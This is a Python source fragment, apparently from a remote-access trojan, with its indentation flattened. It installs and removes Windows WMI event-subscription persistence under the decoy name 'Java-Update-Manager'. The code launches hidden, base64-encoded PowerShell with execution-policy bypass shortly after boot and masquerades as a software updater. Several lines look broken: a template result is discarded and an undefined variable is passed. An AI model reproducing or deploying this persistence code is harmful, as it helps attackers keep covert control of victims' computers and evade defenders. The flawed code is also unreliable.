def _add_powershell_wmi(command=None, name='Java-Update-Manager'):
try:
if os.name == 'nt' and not methods['powershell_wmi'].established:
cmd_line = ""
value = sys.argv[0]
if value and os.path.isfile(value):
cmd_line = 'start /b /min {}'.format(value)
elif command:
cmd_line = r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec bypass -window hidden -noni -nop -encoded {}'.format(base64.b64encode(bytes(command).encode('UTF-16LE')))
if cmd_line:
startup = "'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"
globals()['__Template_wmi'].replace('[STARTUP]', startup).replace('[COMMAND_LINE]', cmd_line).replace('[NAME]', name)
util.powershell(powershell)
code = "Get-WmiObject __eventFilter -namespace root\\subscription -filter \"name='%s'\"" % name
result = util.powershell(code)
if name in result:
return (True, result)
except Exception as e:
util.log('{} error: {}'.format(_add_powershell_wmi.func_name, str(e)))
return (False, None)
def _remove_powershell_wmi(value=None, name='Java-Update-Manager'):
try:
if methods['powershell_wmi'].established:
try:
code = r"""
Get-WmiObject __eventFilter -namespace root\subscription -filter "name='[NAME]'", Remove-WmiObject
Get-WmiObject CommandLineEventConsumer -Namespace root\subscription -filter "name='[NAME]'" , Remove-WmiObject
Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription , Where-Object { $_.filter -match '[NAME]'} , Remove-WmiObject""".replace('[NAME]', name)
result = util.powershell(code)
if not result:
return (False, None)
except: pass
return (methods['powershell_wmi'].established, methods['powershell_wmi'].result)
except Exception as e:
util.log('{} error: {}'.format(_add_powershell_wmi.func_name, str(e)))
return (methods['powershell_wmi'].established, methods['powershell_wmi'].result)